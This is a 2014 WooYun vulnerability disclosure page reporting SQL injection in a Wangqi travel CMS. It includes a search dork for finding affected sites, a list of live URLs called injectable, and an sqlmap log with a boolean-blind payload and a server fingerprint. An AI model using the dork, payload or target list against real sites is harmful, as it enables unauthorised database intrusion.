当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076299

漏洞标题:网奇某cms多处sql注入

相关厂商:wangqi.com

漏洞作者: 路人甲

提交时间:2014-09-17 12:58

修复时间:2014-12-13 13:00

公开时间:2014-12-13 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-17: 细节已通知厂商并且等待厂商处理中
2014-09-22: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-11-16: 细节向核心白帽子及相关领域专家公开
2014-11-26: 细节向普通白帽子公开
2014-12-06: 细节向实习白帽子公开
2014-12-13: 细节向公众公开

简要描述:

注入

详细说明:

注入啊注入

关键词
inurl:viewList.aspx?typeid=
http://free-100.net/searchLines.aspx?LStartDate= 存在sql注入漏洞
http://free-100.net/triplist.aspx?typeID=1 存在sql注入漏洞
http://free-100.net/tripCity.aspx?cityid=12 存在sql注入漏洞
http://free-100.net/searchLines.aspx?LStartDate=&page=1 LStartDate= 存在sql注入漏洞
http://free-100.net/viewList.aspx?typeid=2 存在sql注入漏洞
http://free-100.net/searchLines.aspx?toAdd=%e6%8b%89%e8%90%a8&page=1 存在sql注入漏洞


注入地址:http://free-100.net/viewList.aspx?typeid=2
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 20:57:19
[20:57:19] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\free-100.net\session' as session file
[20:57:19] [INFO] testing connection to the target url
[20:57:19] [INFO] testing if the url is stable, wait a few seconds
[20:57:20] [INFO] url is stable
[20:57:20] [INFO] testing if GET parameter 'typeid' is dynamic
[20:57:26] [INFO] confirming that GET parameter 'typeid' is dynamic
[20:57:26] [INFO] GET parameter 'typeid' is dynamic
[20:57:57] [WARNING] connection timed out while trying to get error page informa
tion (500)
[20:57:57] [WARNING] heuristic test shows that GET parameter 'typeid' might not
be injectable
[20:57:57] [INFO] testing sql injection on GET parameter 'typeid'
[20:57:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:58:11] [INFO] GET parameter 'typeid' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[20:58:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[20:58:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:58:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[20:58:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[20:58:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:58:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[20:58:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[20:58:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:58:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:58:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:58:50] [INFO] testing 'Oracle AND time-based blind'
[20:58:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:59:29] [WARNING] connection timed out while trying to get error page informa
tion (500)
[20:59:39] [INFO] target url appears to be UNION injectable with 2 columns
[20:59:52] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[20:59:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:59:52] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
n
[21:00:03] [INFO] target url appears to be UNION injectable with 1 columns
[21:00:03] [INFO] checking if the injection point on GET parameter 'typeid' is a
false positive
GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 48 HTTP(s) requ
ests:
---
Place: GET
Parameter: typeid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: typeid=2 AND 6769=6769
---
[21:00:16] [INFO] testing MySQL
[21:00:16] [WARNING] the back-end DBMS is not MySQL
[21:00:16] [INFO] testing Oracle
[21:00:17] [WARNING] the back-end DBMS is not Oracle
[21:00:17] [INFO] testing PostgreSQL
[21:00:17] [WARNING] the back-end DBMS is not PostgreSQL
[21:00:17] [INFO] testing Microsoft SQL Server
[21:00:17] [INFO] confirming Microsoft SQL Server
[21:00:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[21:00:22] [INFO] fetching database names
[21:00:22] [INFO] fetching number of databases
[21:00:22] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[21:00:22] [INFO] retrieved:
[21:00:27] [ERROR] unable to retrieve the number of databases
[21:00:27] [INFO] falling back to current database
[21:00:27] [INFO] fetching current database
[21:00:27] [INFO] retrieved:
[21:00:36] [CRITICAL] unable to retrieve the database names
[21:00:36] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 51 times
[*] shutting down at 21:00:36


http://www.lzql.cn/viewList.aspx?typeid=5
http://www.free-100.net/viewList.aspx?typeid=1
http://etrip.wangqi.com/viewList.aspx?typeid=1
http://v2.wqetrip.com/viewList.aspx?typeid=2
.......

漏洞证明:

sql

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-13 13:00

厂商回复:

最新状态:

暂无